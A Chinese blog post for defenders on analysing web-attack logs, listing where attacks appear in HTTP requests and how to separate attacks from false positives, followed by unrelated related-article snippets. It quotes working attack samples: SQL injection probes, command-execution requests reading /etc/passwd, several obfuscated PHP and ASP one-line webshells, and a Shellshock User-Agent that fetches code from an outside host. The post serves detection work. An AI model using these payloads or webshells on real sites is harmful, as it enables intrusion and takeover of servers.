日志分析简单总结

news/2024/9/23 7:21:00/

1、分析日志的目的

误报:不是攻击而上报成攻击
漏报:是攻击而没有防御的情况
日志分析可以判断是否误判或者漏判,可以溯源攻击行为
在护网作为防守方必备的技能(分析NGAF和态势感知,发现异常)

2、攻击出现的位置

Get、post 请求报文的url字段

•Get 、post请求 URL参数涉及到的攻击
•xss攻击
•SQL注入
•命令执行
•文件包含
•目录穿越
•webshell
•信息泄露
•网站扫描
cookie字段、referer字段、post表单字段和url请求类似


Get 、post请求报文的cookie字段


Get、post请求报文的referer字段


Post请求报文的表单字段

user-agent部分
•恶意爬虫:Python-urllib/2.6、Baidu-YunGuanCe-ScanBot(ce.baidu.com)
•扫描器:morfeus fucking scanner、 Accept:acunetix/wvs
•sql注入漏洞:sqlmap/1.0.8.15#dev (http://sqlmap.org)
•xss攻击:'%22()%26%25<ScRiPt%20>prompt(961668)</ScRiPt>
•其它非常特殊攻击 :User-Agent: () { :; }; /bin/mkdir -p /share/HDB_DATA/.../ && /usr/bin/wget
-q -c http://lliillii.altervista.org/io.php 0<&1 2>&1


Get 、post请求报文的user-agent字段


Http应答页面

http报文负载

•webshell (请求和应答方向都可能)
•信息泄露(应答方向)

3、攻击常见的语句

sql注入命令

探测语句
•http://www.19cn.com/showdetail.asp?id=49 and 1=1
•http://www.19cn.com/showdetail.asp?id=49 or 1=1
•and char(124)%2Buser%2Bchar(124)=0 (注入类型判断)


权限判断
•and user>0 用户名
•and 1=(select IS_SRVROLEMEMBER('sysadmin')) 权限
•and exists (select * from sysobjects) 数据库类型判断sqlserver

查询数据

and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6) 查库名
and (select top 1 name from TestDB.dbo.sysobjects where xtype='U' and status>0 查表名
and (select count(字段名) from 表名)>0 猜字段
and (select top 1 len(username) from admin)=X 猜字段值
http://localhost/mytest/sqlinject/id=1+UNION+SELECT+1,password,3,username,5,6,7,8,9+FROM+user
union select            猜解法
and ascii(lower(substring((select top 1 name from sysobjects where xtype='u'), 1, 1))) > 116

命令执行

GET /simple/tests/tmssql.php?do=phpinfo
GET /detail.php?id=/winnt/system32/cmd.exe?/c+dir+c:%5c
GET /cgi/maker/ptcmd.cgi?cmd=;cat+/tmp/config/usr.ini
GET /cgi/maker/ptcmd.cgi?cmd=;cat+/etc/passwd

webshell

•<?php @preg_replace("/[email]/e",$_POST['h'],"error"); ?>
•<%eval(eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("123"))%>
•<%r+k-es+k-p+k-on+k-se.co+k-d+k-e+k-p+k-age=936:e+k-v+k-a+k-lr+k-e+k-q+k-u+k-e+k-s+k-
t("c")%>(UTF-7编码格式的一句话木马)
•<?php @$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";@$_/*-/*-*/($/*-/*-
*/{"P"./*-/*-*/"OS"./*-/*-*/"T"}[/*-/*-*/0/*-/*-*/]);?>
•<%eval request("sb")%>
•<%execute request("sb")%>
•<?php eval($_POST[sb]);?>
•<?php @eval($_POST[sb]);?>
•<?$_POST['sa']($_POST['sb']);?>

信息泄露

配置文件访问
•httpd.conf
•htaccess
•HTPASSWD
•boot.ini
•etc/passwd
•Php.ini
•Web.xml

网站扫描

恶意爬虫
•浏览器的user-agent字段一般都比较固定如:
•User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1;Trident/5.0) ——IE 9.0
•不是浏览器的user-agent ,很可能就是爬虫
扫描软件: user-agent字段或者单独标示自己的软件
•综合扫描器: wvs、 appscan
专用扫描器: sql注入

4、攻击常见的特点

攻击特点:
•攻击一般都有一定的连续性,所以一段时间会产生多条日志,并且命中特
征id是有一定分布的,不能是只命中某个特征。
•攻击一般都会借助工具进行,同一个IP地址日志间隔较小 ,可能一秒中产
生几条日志,明显不是人操作浏览器的行为。
•攻击者可能会借助一定跳板,如果IP地址是国外的,攻击嫌疑较大。

5、攻击日志分析流程

基于攻击IP地址方法分析(适用日志较多的情况)

•找出一个明显的攻击行为的日志
•根据该日志找出攻击源IP地址
•筛选出针对该IP地址的日志,这种情况下基本都是攻击,没有误报
•针对该IP地址,利用前面介绍的知识,就可以看出攻击者都发起了哪些攻

基于攻击方法分析(适用每类不太多的攻击)

看攻击语句,是否是明显攻击行为
如果能看出是明显的行为,就可以确定是攻击
如果不确定,还需要结合其他参数,
源IP地址 :是否出现过其他类型可以明确的攻击行为
攻击时间:如果半夜或者凌晨活动比较频繁 ,可以怀疑为攻击。
日志频率 :一秒中出现几次日志,可以怀疑为攻击。
攻击位置:国外的ip地址 ,可以怀疑为攻击
报文语义分析:比如访问admin文件夹 ,可能是有攻击行为
上述几个参数可以组合分析,进一步确定攻击

前面说的用户网站存在一定安全隐患是这种情况的一种
还有一种情况 ,用户的应用比较特殊,理论上所有规则都能误报
•用户是一个论坛类应用,可以提交任意东西,包括文章类
•用户是一个代码提交讨论网站,经常通过post表单提交代码
•这类应用主要体现在学校应用中较多


http://www.ppmy.cn/news/1433164.html

相关文章

Linux内核驱动开发-006内核定时器

1驱动程序 /*************************************************************************> File Name: timer.c> Author: yas> Mail: rage_yashotmail.com> Created Time: 2024年04月23日 星期二 19时20分42秒*************************************************…

MongoDB聚合运算符:$setUnion

MongoDB聚合运算符&#xff1a;$setUnion 文章目录 MongoDB聚合运算符&#xff1a;$setUnion语法使用举例 $setUnion聚合运算符返回两个或多个数组的并集。 语法 { $setUnion: [ <expression1>, <expression2>, ... ] }<expression>为可解析为数组的表达式。…

导出JVM的线程信息

1. 查询出Java应用的进程的PID ps -ef|grep java 此时的PID是 33 2. 使用JDK自带的工具jstack导出日志 jstack -l 33 > 2022jstack.log 3.然后直接下载

Centos7系统下安装Nginx并配置域名转发实现域名访问

感谢李天健同学辛苦创作&#xff0c;对于Nginx配置未完成的同学请移步他的博客。 传送门&#xff1a;Centos7系统下安装Nginx并配置域名转发实现域名访问 传送门2&#xff1a;1.24.0

使用yolo识别模型对比两张图片并标记不同(2)

上篇文章有漏洞&#xff0c;在这里补充下&#xff0c;比如要识别第二张图相对于第一张图的违建是否拆除了 第一步旋转对其后&#xff0c;图片会有黑色的掩码&#xff0c;如果旋转角度大的话&#xff0c;没识别出来的框可能不是已经拆除了&#xff0c;而是因为黑色掩码遮挡&…

【hackmyvm】 Quick2靶机

渗透流程 渗透开始1.IP地址 获取2.端口扫描3.任意文件读取4.扫描目录5.总结信息6.漏洞扫描7.php_filter_chain_generator.py使用8.提权 渗透开始 1.IP地址 获取 ┌─[✗]─[userparrot]─[~] └──╼ $fping -ag 192.168.9.0/24 2>/dev/null 192.168.9.124 本机 192.1…

ORB-SLAM2算法单目流程

ORB-SLAM系列算法框架比较复杂&#xff0c;下面来梳理一下单目算法的流程。 一&#xff1a;单目初始化 单目初始化也就是单目的地图初始化。流程如下&#xff1a; * Step 1&#xff1a;&#xff08;未创建&#xff09;得到用于初始化的第一帧&#xff0c;初始化需要两帧 * …

SpringBoot+Vue开发记录(三)

说明&#xff1a;本篇文章的主要内容为需求分析。需求分析这一部分很重要&#xff0c;也稍微有点子难搞&#xff0c;所以本篇文章里的有些内容会有失偏颇。 一、准备步骤 我打算做一个刷题项目&#xff0c;但是具体这个项目该怎么做&#xff0c;我是一头雾水。 所以就要先进行…